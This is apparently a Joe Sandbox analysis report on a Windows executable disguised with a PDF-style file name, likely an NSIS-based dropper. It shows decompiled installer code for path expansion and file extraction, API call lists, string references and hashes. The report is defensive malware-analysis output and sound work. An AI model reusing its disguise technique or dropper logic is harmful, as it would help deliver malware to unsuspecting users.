                                                                      • Inst, xrefs: 00402FBC
                                                                      • C:\Users\user\Desktop, xrefs: 00402F30, 00402F35, 00402F3B
                                                                      • soft, xrefs: 00402FC5
                                                                      • Null, xrefs: 00402FCE
                                                                      • C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe, xrefs: 00402EEF, 00402EFE, 00402F12, 00402F2F
                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
                                                                      • "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe", xrefs: 00402ED5
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
                                                                      • Error launching installer, xrefs: 00402F25
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 2803837635-3944960428
                                                                      • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                      • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                                      • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                                      • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 431 406234-40623f 432 406241-406250 431->432 433 406252-406268 431->433 432->433 434 406480-406486 433->434 435 40626e-40627b 433->435 436 40648c-406497 434->436 437 40628d-40629a 434->437 435->434 438 406281-406288 435->438 439 4064a2-4064a3 436->439 440 406499-40649d call 406212 436->440 437->436 441 4062a0-4062ac 437->441 438->434 440->439 443 4062b2-4062ee 441->443 444 40646d 441->444 445 4062f4-4062ff GetVersion 443->445 446 40640e-406412 443->446 447 40647b-40647e 444->447 448 40646f-406479 444->448 449 406301-406305 445->449 450 406319 445->450 451 406414-406418 446->451 452 406447-40644b 446->452 447->434 448->434 449->450 453 406307-40630b 449->453 456 406320-406327 450->456 454 406428-406435 call 406212 451->454 455 40641a-406426 call 406159 451->455 457 40645a-40646b lstrlenW 452->457 458 40644d-406455 call 406234 452->458 453->450 459 40630d-406311 453->459 469 40643a-406443 454->469 455->469 461 406329-40632b 456->461 462 40632c-40632e 456->462 457->434 458->457 459->450 465 406313-406317 459->465 461->462 467 406330-40634d call 4060df 462->467 468 40636a-40636d 462->468 465->456 477 406352-406356 467->477 472 40637d-406380 468->472 473 40636f-40637b GetSystemDirectoryW 468->473 469->457 471 406445 469->471 478 406406-40640c call 4064a6 471->478 475 406382-406390 GetWindowsDirectoryW 472->475 476 4063eb-4063ed 472->476 474 4063ef-4063f3 473->474 474->478 480 4063f5-4063f9 474->480 475->476 476->474 479 406392-40639c 476->479 477->480 481 40635c-406365 call 406234 477->481 478->457 484 4063b6-4063cc SHGetSpecialFolderLocation 479->484 485 40639e-4063a1 479->485 480->478 487 4063fb-406401 lstrcatW 480->487 481->474 489 4063e7 484->489 490 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 484->490 485->484 488 4063a3-4063aa 485->488 487->478 492 4063b2-4063b4 488->492 489->476 490->474 490->489 492->474 492->484
                                                                      C-Code - Quality: 74%
                                                                      			E00406234(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t48 =  *( *0x42921c - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x42a278 + _t48 * 2;
				_t49 = 0x4281e0;
				_t114 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406234(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x4281e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = (_a8 << 0xb) + 0x42b000;
							E00406212(_t114, (_a8 << 0xb) + 0x42b000);
						} else {
							E00406159(_t114,  *0x42a248);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004064A6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42a2c4;
						if( *0x42a2c4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x42a244;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E004060DF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406234(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406212(_a4, _t49);
			}






























                                                                      0x00406234
                                                                      0x00406234
                                                                      0x00406234
                                                                      0x0040623a
                                                                      0x0040623f
                                                                      0x00406250
                                                                      0x00406250
                                                                      0x00406258
                                                                      0x00406259
                                                                      0x0040625a
                                                                      0x0040625b
                                                                      0x0040625e
                                                                      0x00406266
                                                                      0x00406268
                                                                      0x00406281
                                                                      0x00406284
                                                                      0x00406284
                                                                      0x00406480
                                                                      0x00406480
                                                                      0x00406486
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406294
                                                                      0x0040629a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062a2
                                                                      0x004062a3
                                                                      0x004062a5
                                                                      0x004062a9
                                                                      0x004062ac
                                                                      0x0040646d
                                                                      0x0040647b
                                                                      0x0040647e
                                                                      0x0040647e
                                                                      0x0040646f
                                                                      0x00406472
                                                                      0x00406475
                                                                      0x00406477
                                                                      0x00406477
                                                                      0x00000000
                                                                      0x0040646d
                                                                      0x004062b2
                                                                      0x004062b5
                                                                      0x004062c4
                                                                      0x004062ca
                                                                      0x004062cd
                                                                      0x004062d0
                                                                      0x004062da
                                                                      0x004062df
                                                                      0x004062e1
                                                                      0x004062e5
                                                                      0x004062e8
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x0040640e
                                                                      0x00406412
                                                                      0x00406447
                                                                      0x0040644b
                                                                      0x00406450
                                                                      0x00406455
                                                                      0x00406455
                                                                      0x0040645a
                                                                      0x0040645b
                                                                      0x00406460
                                                                      0x00406463
                                                                      0x00406466
                                                                      0x00000000
                                                                      0x00406466
                                                                      0x00406414
                                                                      0x00406418
                                                                      0x0040642e
                                                                      0x00406435
                                                                      0x0040641a
                                                                      0x00406421
                                                                      0x00406421
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406406
                                                                      0x00406407
                                                                      0x00406407
                                                                      0x00000000
                                                                      0x00406443
                                                                      0x004062f6
                                                                      0x004062f7
                                                                      0x004062fd
                                                                      0x004062ff
                                                                      0x00406319
                                                                      0x00406319
                                                                      0x00406320
                                                                      0x00406320
                                                                      0x00406327
                                                                      0x0040632b
                                                                      0x0040632b
                                                                      0x0040632c
                                                                      0x0040632e
                                                                      0x0040636a
                                                                      0x0040636d
                                                                      0x0040637d
                                                                      0x00406380
                                                                      0x00406388
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x004063eb
                                                                      0x004063eb
                                                                      0x004063ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406392
                                                                      0x00406399
                                                                      0x0040639a
                                                                      0x0040639c
                                                                      0x004063b6
                                                                      0x004063c4
                                                                      0x004063ca
                                                                      0x004063cc
                                                                      0x004063e7
                                                                      0x004063e7
                                                                      0x004063e7
                                                                      0x00000000
                                                                      0x004063e7
                                                                      0x004063d2
                                                                      0x004063dd
                                                                      0x004063e3
                                                                      0x004063e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063e5
                                                                      0x0040639e
                                                                      0x004063a1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063b0
                                                                      0x004063b2
                                                                      0x004063b4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063b4
                                                                      0x00000000
                                                                      0x004063eb
                                                                      0x00406375
                                                                      0x00000000
                                                                      0x00406330
                                                                      0x00406332
                                                                      0x0040634d
                                                                      0x00406352
                                                                      0x00406356
                                                                      0x004063f5
                                                                      0x004063f5
                                                                      0x004063f9
                                                                      0x00406401
                                                                      0x00406401
                                                                      0x00000000
                                                                      0x004063f9
                                                                      0x00406360
                                                                      0x004063ef
                                                                      0x004063ef
                                                                      0x004063f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063f3
                                                                      0x0040632e
                                                                      0x00406301
                                                                      0x00406305
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406307
                                                                      0x0040630b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040630d
                                                                      0x00406311
                                                                      0x00000000
                                                                      0x00406313
                                                                      0x00406313
                                                                      0x00000000
                                                                      0x00406313
                                                                      0x00406311
                                                                      0x0040648c
                                                                      0x00406497
                                                                      0x004064a3
                                                                      0x004064a3
                                                                      0x00000000

                                                                      APIs
                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000), ref: 004062F7
                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
                                                                      • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,?,004053A8,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000), ref: 0040645B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-649026841
                                                                      • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                      • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                                      • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                      • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 757 40176f-401794 call 402c53 call 405c3d 762 401796-40179c call 406212 757->762 763 40179e-4017b0 call 406212 call 405bc6 lstrcatW 757->763 769 4017b5-4017b6 call 4064a6 762->769 763->769 772 4017bb-4017bf 769->772 773 4017c1-4017cb call 406555 772->773 774 4017f2-4017f5 772->774 782 4017dd-4017ef 773->782 783 4017cd-4017db CompareFileTime 773->783 776 4017f7-4017f8 call 405dc2 774->776 777 4017fd-401819 call 405de7 774->777 776->777 784 40181b-40181e 777->784 785 40188d-4018b6 call 405371 call 40317b 777->785 782->774 783->782 786 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 784->786 787 40186f-401879 call 405371 784->787 799 4018b8-4018bc 785->799 800 4018be-4018ca SetFileTime 785->800 786->772 820 401864-401865 786->820 797 401882-401888 787->797 801 402ae4 797->801 799->800 803 4018d0-4018db CloseHandle 799->803 800->803 804 402ae6-402aea 801->804 806 4018e1-4018e4 803->806 807 402adb-402ade 803->807 809 4018e6-4018f7 call 406234 lstrcatW 806->809 810 4018f9-4018fc call 406234 806->810 807->801 815 401901-4022fc call 405957 809->815 810->815 815->804 820->797 822 401867-401868 820->822 822->787
                                                                      C-Code - Quality: 77%
                                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C53(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405C3D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405BC6(E00406212(_t84, L"C:\\Users\\Arthur\\AppData\\Local\\Deskriptiv155\\Hjertere")), ??);
				} else {
					E00406212();
				}
				E004064A6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406555(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405DC2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405DE7(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405371(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2c8;
						goto L32;
					} else {
						E00406212("C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp", _t81);
						E00406212(_t81, _t84);
						E00406234(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406212(_t81, "C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp");
						_t64 = E00405957("C:\Users\Arthur\AppData\Local\Temp\nssE334.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405371();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405371(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2f4 =  *0x42a2f4 + 1;
				_t45 = E0040317B(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x42a2f4 =  *0x42a2f4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405957();
					goto L29;
				}
				goto L33;
			}


















                                                                      0x0040176f
                                                                      0x00401776
                                                                      0x00401782
                                                                      0x00401785
                                                                      0x0040178a
                                                                      0x0040178d
                                                                      0x00401794
                                                                      0x004017b0
                                                                      0x00401796
                                                                      0x00401797
                                                                      0x00401797
                                                                      0x004017b6
                                                                      0x004017bb
                                                                      0x004017bb
                                                                      0x004017bf
                                                                      0x004017c2
                                                                      0x004017c7
                                                                      0x004017c9
                                                                      0x004017cb
                                                                      0x004017d0
                                                                      0x004017d0
                                                                      0x004017db
                                                                      0x004017db
                                                                      0x004017ec
                                                                      0x004017ee
                                                                      0x004017ee
                                                                      0x004017ef
                                                                      0x004017ef
                                                                      0x004017f2
                                                                      0x004017f5
                                                                      0x004017f8
                                                                      0x004017f8
                                                                      0x004017ff
                                                                      0x0040180e
                                                                      0x00401813
                                                                      0x00401816
                                                                      0x00401819
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040181b
                                                                      0x0040181e
                                                                      0x00401874
                                                                      0x00401879
                                                                      0x004015b6
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402adb
                                                                      0x00402ade
                                                                      0x00402ade
                                                                      0x00000000
                                                                      0x00401820
                                                                      0x00401826
                                                                      0x0040182d
                                                                      0x0040183a
                                                                      0x00401845
                                                                      0x0040185b
                                                                      0x0040185b
                                                                      0x0040185e
                                                                      0x00000000
                                                                      0x00401864
                                                                      0x00401864
                                                                      0x00401865
                                                                      0x00401882
                                                                      0x00402ae4
                                                                      0x00402ae4
                                                                      0x00402ae4
                                                                      0x00401867
                                                                      0x00401867
                                                                      0x00401868
                                                                      0x00401493
                                                                      0x004022f7
                                                                      0x004022f7
                                                                      0x004022f7
                                                                      0x00401865
                                                                      0x0040185e
                                                                      0x00402ae6
                                                                      0x00402aea
                                                                      0x00402aea
                                                                      0x00401892
                                                                      0x00401897
                                                                      0x004018a5
                                                                      0x004018aa
                                                                      0x004018b0
                                                                      0x004018b4
                                                                      0x004018b6
                                                                      0x004018be
                                                                      0x004018ca
                                                                      0x004018b8
                                                                      0x004018b8
                                                                      0x004018bc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004018bc
                                                                      0x004018d3
                                                                      0x004018d9
                                                                      0x004018db
                                                                      0x00000000
                                                                      0x004018e1
                                                                      0x004018e1
                                                                      0x004018e4
                                                                      0x004018fc
                                                                      0x004018e6
                                                                      0x004018e9
                                                                      0x004018f2
                                                                      0x004018f2
                                                                      0x00401901
                                                                      0x00401906
                                                                      0x004022f2
                                                                      0x00000000
                                                                      0x004022f2
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Deskriptiv155\Hjertere,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                        • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                        • Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00402EAD), ref: 004053CC
                                                                        • Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll), ref: 004053DE
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                        • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
